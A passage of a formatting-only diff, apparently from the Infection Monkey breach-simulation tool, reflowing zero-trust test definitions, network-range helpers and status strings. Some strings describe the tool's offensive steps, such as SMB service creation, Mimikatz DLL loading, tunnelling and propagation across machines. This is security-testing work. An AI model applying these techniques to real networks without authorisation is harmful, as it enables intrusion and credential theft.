+ PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
+ "should be MAC (Mandatory "
+ "Access Control) only.",
+ PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
+ "recovery scenarios.",
+ PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
+ PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@@ -98,184 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
- TEST_SEGMENTATION: {
- TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
- "running on, that belong to different network segments.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
- STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
+ TEST_SEGMENTATION: {
+ TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can "
+ "communicate with from the machine it's "
+ "running on, that belong to different network segments.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and"
+ " logs.",
+ STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, "
+ "check firewall logs.",
},
- PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
- PILLARS_KEY: [NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
+ PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
+ PILLARS_KEY: [NETWORKS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
- TEST_MALICIOUS_ACTIVITY_TIMELINE: {
- TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
- "exploitation.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
+ TEST_MALICIOUS_ACTIVITY_TIMELINE: {
+ TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking "
+ "actions, like scanning and attempting "
+ "exploitation.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and "
+ "alerts."
},
- PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
- PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
+ PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
+ PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
- TEST_ENDPOINT_SECURITY_EXISTS: {
- TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
- "software on endpoints.",
- STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
- "security concern. ",
+ TEST_ENDPOINT_SECURITY_EXISTS: {
+ TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an "
+ "endpoint security software.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and "
+ "activate anti-virus "
+ "software on endpoints.",
+ STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to "
+ "see if Monkey was a "
+ "security concern. ",
},
- PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
- PILLARS_KEY: [DEVICES],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
+ PILLARS_KEY: [DEVICES],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_MACHINE_EXPLOITED: {
- TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
- "which endpoints were compromised.",
- STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
+ TEST_MACHINE_EXPLOITED: {
+ TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to "
+ "breach them and propagate in the network.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
+ "activity recognized and see "
+ "which endpoints were compromised.",
+ STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
},
- PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
- PILLARS_KEY: [DEVICES],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
+ PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
+ PILLARS_KEY: [DEVICES],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
},
- TEST_SCHEDULED_EXECUTION: {
- TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
- "software.",
- STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
+ TEST_SCHEDULED_EXECUTION: {
+ TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in "
+ "User-Behavior security "
+ "software.",
+ STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
},
- PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
- PILLARS_KEY: [PEOPLE, NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
+ PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
+ PILLARS_KEY: [PEOPLE, NETWORKS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
},
- TEST_DATA_ENDPOINT_ELASTIC: {
- TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
- "that indicate attempts to access them. ",
+ TEST_DATA_ENDPOINT_ELASTIC: {
+ TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to "
+ "ElasticSearch instances.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by "
+ "encrypting it in in-transit.",
+ STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such "
+ "instances, look for alerts "
+ "that indicate attempts to access them. ",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY: [DATA],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_DATA_ENDPOINT_HTTP: {
- TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
- "attempts to access them. ",
+ TEST_DATA_ENDPOINT_HTTP: {
+ TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP " "servers.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in"
+ " in-transit.",
+ STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, "
+ "look for alerts that indicate "
+ "attempts to access them. ",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY: [DATA],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_DATA_ENDPOINT_POSTGRESQL: {
- TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
- "indicate attempts to access them. ",
+ TEST_DATA_ENDPOINT_POSTGRESQL: {
+ TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
+ " it in in-transit.",
+ STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, "
+ "look for alerts that "
+ "indicate attempts to access them. ",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY: [DATA],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_TUNNELING: {
- TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
- "restrict them. "
+ TEST_TUNNELING: {
+ TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies "
+ "are too permissive - "
+ "restrict them. "
},
- PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
- PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
+ PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
+ PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
},
- TEST_COMMUNICATE_AS_NEW_USER: {
- TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
- "restrict them to MAC only.",
- STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
+ TEST_COMMUNICATE_AS_NEW_USER: {
+ TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate "
+ "with the internet from it.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies "
+ "are too permissive - "
+ "restrict them to MAC only.",
+ STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
},
- PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
- PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
+ PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
- TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
- STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
+ TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
+ TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
+ STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
},
- PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
- PILLARS_KEY: [NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
+ PILLARS_KEY: [NETWORKS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
- STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
+ TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
+ TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing " "unencrypted data.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
+ STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY: [DATA],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
- STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
+ TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
+ TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not "
+ "protected against data loss.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
+ STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
},
- PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
+ PILLARS_KEY: [DATA],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
- STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
+ TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
+ TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' " "authentication.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
+ STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
},
- PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
- PILLARS_KEY: [PEOPLE, WORKLOADS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
+ PILLARS_KEY: [PEOPLE, WORKLOADS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found permissive user access policies.",
- STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
+ TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
+ TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access " "policies.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "ScoutSuite found permissive user access policies.",
+ STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
},
- PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
- PILLARS_KEY: [PEOPLE, WORKLOADS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
+ PILLARS_KEY: [PEOPLE, WORKLOADS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_LOGGING: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found logging issues.",
- STATUS_PASSED: "ScoutSuite found no logging issues.",
+ TEST_SCOUTSUITE_LOGGING: {
+ TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "ScoutSuite found logging issues.",
+ STATUS_PASSED: "ScoutSuite found no logging issues.",
},
- PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
- PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
+ PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_SERVICE_SECURITY: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found service security issues.",
- STATUS_PASSED: "ScoutSuite found no service security issues.",
+ TEST_SCOUTSUITE_SERVICE_SECURITY: {
+ TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
+ FINDING_EXPLANATION_BY_STATUS_KEY: {
+ STATUS_FAILED: "ScoutSuite found service security issues.",
+ STATUS_PASSED: "ScoutSuite found no service security issues.",
},
- PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
- PILLARS_KEY: [DEVICES, NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
+ PILLARS_KEY: [DEVICES, NETWORKS],
+ POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
}
@@ -284,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
- DATA: [],
- PEOPLE: [],
- NETWORKS: [],
- DEVICES: [],
- WORKLOADS: [],
- VISIBILITY_ANALYTICS: [],
- AUTOMATION_ORCHESTRATION: [],
+ DATA: [],
+ PEOPLE: [],
+ NETWORKS: [],
+ DEVICES: [],
+ WORKLOADS: [],
+ VISIBILITY_ANALYTICS: [],
+ AUTOMATION_ORCHESTRATION: [],
}
PRINCIPLES_TO_TESTS = {}
diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py
index 581c4bf77..34a415272 100644
--- a/monkey/common/network/network_range.py
+++ b/monkey/common/network/network_range.py
@@ -99,7 +99,7 @@ class IpRange(NetworkRange):
addresses = ip_range.split("-")
if len(addresses) != 2:
raise ValueError(
- "Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range
+ "Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range
)
self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses]
elif (lower_end_ip is not None) and (higher_end_ip is not None):
@@ -112,8 +112,8 @@ class IpRange(NetworkRange):
self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip)
if self._higher_end_ip_num < self._lower_end_ip_num:
raise ValueError(
- "Higher end IP %s is smaller than lower end IP %s"
- % (self._lower_end_ip, self._higher_end_ip)
+ "Higher end IP %s is smaller than lower end IP %s"
+ % (self._lower_end_ip, self._higher_end_ip)
)
def __repr__(self):
@@ -159,7 +159,8 @@ class SingleIpRange(NetworkRange):
@staticmethod
def string_to_host(string_):
"""
- Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
+ Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name
+ and ip
:param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""
@@ -176,8 +177,8 @@ class SingleIpRange(NetworkRange):
domain_name = string_
except socket.error:
LOG.error(
- "Your specified host: {} is not found as a domain name and"
- " it's not an IP address".format(string_)
+ "Your specified host: {} is not found as a domain name and"
+ " it's not an IP address".format(string_)
)
return None, string_
# If a string_ was entered instead of IP we presume that it was domain name and translate it
diff --git a/monkey/common/network/network_utils.py b/monkey/common/network/network_utils.py
index 6aa5076ae..2b01d1974 100644
--- a/monkey/common/network/network_utils.py
+++ b/monkey/common/network/network_utils.py
@@ -4,8 +4,10 @@ from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
- URL structure is ":///;?#" (https://tools.ietf.org/html/rfc1808.html)
- And the net_loc is ":@:" (https://tools.ietf.org/html/rfc1738#section-3.1)
+ URL structure is ":///;?#" (
+ https://tools.ietf.org/html/rfc1808.html)
+ And the net_loc is ":@:" (
+ https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""
diff --git a/monkey/common/network/segmentation_utils.py b/monkey/common/network/segmentation_utils.py
index 9bbaabf1d..d48c005cb 100644
--- a/monkey/common/network/segmentation_utils.py
+++ b/monkey/common/network/segmentation_utils.py
@@ -14,8 +14,10 @@ def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
- :param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
- :return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
+ :param subnet: Subnet to check if one of ip_addresses is in there. This is
+ common.network.network_range.NetworkRange
+ :return: The first IP in ip_addresses which is in the subnet if there is one, otherwise
+ returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):
diff --git a/monkey/common/utils/attack_utils.py b/monkey/common/utils/attack_utils.py
index c911ed780..c30ab36f8 100644
--- a/monkey/common/utils/attack_utils.py
+++ b/monkey/common/utils/attack_utils.py
@@ -14,27 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
- ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
- ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
+ ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
+ ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service "
+ "via MS-SCMR.",
}
MIMIKATZ = {
- ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
- ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
+ ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
+ ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
}
MIMIKATZ_WINAPI = {
- ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
- ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
+ ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
+ ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
}
DROPPER = {
- ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
+ ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
- ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
- ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
- " for monkey process wasn't successful.",
+ ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's "
+ "process.",
+ ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
+ " for monkey process wasn't successful.",
}
DROPPER_WINAPI = {
- ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
+ ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
}
diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py
index a76548738..73f0dd9f7 100644
--- a/monkey/common/utils/mongo_utils.py
+++ b/monkey/common/utils/mongo_utils.py
@@ -35,8 +35,8 @@ class MongoUtils:
# objectSid property of ds_user is problematic and need this special treatment.
# ISWbemObjectEx interface. Class Uint8Array ?
if (
- str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid)
- == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}"
+ str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid)
+ == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}"
):
return o.Value
except Exception:
diff --git a/monkey/common/version.py b/monkey/common/version.py
index 4070fc2f6..228163e9a 100644
--- a/monkey/common/version.py
+++ b/monkey/common/version.py
@@ -1,4 +1,5 @@
-# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
+# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for
+# details).
import argparse
from pathlib import Path
@@ -17,7 +18,8 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
- "-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
+ "-b", "--build", default=BUILD, help="Choose the build string for this version.",
+ type=str
)
args = parser.parse_args()
print(get_version(args.build))
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index 7aeaccee2..ffdea551e 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -227,7 +227,8 @@ class Configuration(object):
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
- Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
+ Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data
+ plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.
diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py
index 4ccd2bec4..cc98c5e6d 100644
--- a/monkey/infection_monkey/control.py
+++ b/monkey/infection_monkey/control.py
@@ -23,7 +23,6 @@ from infection_monkey.utils.exceptions.planned_shutdown_exception import Planned
__author__ = "hoffer"
-
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@@ -32,7 +31,8 @@ DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# random number greater than 5,
-# to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere.
+# to prevent the monkey from just waiting forever to try and connect to an island before going
+# elsewhere.
TIMEOUT_IN_SECONDS = 15
@@ -52,32 +52,32 @@ class ControlClient(object):
